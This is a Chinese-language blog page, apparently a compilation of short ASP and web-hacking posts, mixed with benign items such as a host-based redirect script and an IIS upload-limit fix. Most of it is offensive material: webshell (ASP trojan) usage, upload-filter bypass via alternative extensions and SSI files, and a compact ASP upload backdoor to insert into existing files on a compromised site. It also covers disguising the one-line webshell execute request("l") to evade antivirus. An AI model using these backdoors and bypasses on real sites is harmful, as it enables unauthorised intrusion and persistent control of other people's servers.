小健博客网络技术综合大全

    在网上下载一个asp木马，或者收集到一个好的木马，但是加密了，怕有后门不敢使用？

我来教大家一个方法，就算有后门也就不用怕了。

在asp木马的最前面加上下面红色的代码

<%if request("login")="xiaojian" then session("login")="xiaojian"

      昨天一朋友要我帮助他实现这样子的一个功能，就是同一个空间 用 www.a.com 访问 就访问根目录的 a.html 文件  用 www.b.com  就访问根目录的b.htm

于我用ASP写了一个给他，代码贴出来与大家共享一下

<%
select case request.servervariables("http_host")
...

      我们在得到网站的后台，或者直接得到一个上传的界面时，有时候程序会直接禁止上传asp扩展的文件，这个时候我们可以上传 asa,cer,cdx这些格式的，或者上传aspx,php这些格式的木马，不过我想这些大家基本上都知道了，今天讲另一个方法，那就是stm，shtm，shtml这些格式的利用，新建一个1.shtml 内容为：

<!--#ECHO var="ALL_HTTP"--><br>
...

用ASP木马进去后，随便打开一个ASP文件，在ASP文件里面插入下面的一段代码，随便插哪里，只要能用下面的方法打开就行。

<%if request.QueryString("action")="login" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
...

正常的ASP小马都会被认出来，或者被杀毒追杀，看到就直接干掉，下面介绍两种方法，一种变形，一种隐身，大家学习学习。

1.　变形

       我们在上传的时候不能上传包含〈%%〉标记,这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。

         原程序代码是：

　　〈%execute request("l")%〉
...

今天测试一个Z-Blog程序的上传文件时发现总提示“ 007~ASP 0104~不允许操作 ”的错误，经过百度上各位朋友的帮忙，终于找到解决方法。

这是windows2003 server对上传文件的限制导致的，默认上传文件只能是200K。可通过以下方式提升上传文件大小限制。
方法一：
第一步：修改IIS设置，允许直接编辑配置数据库。先打开，Internet信息服务
...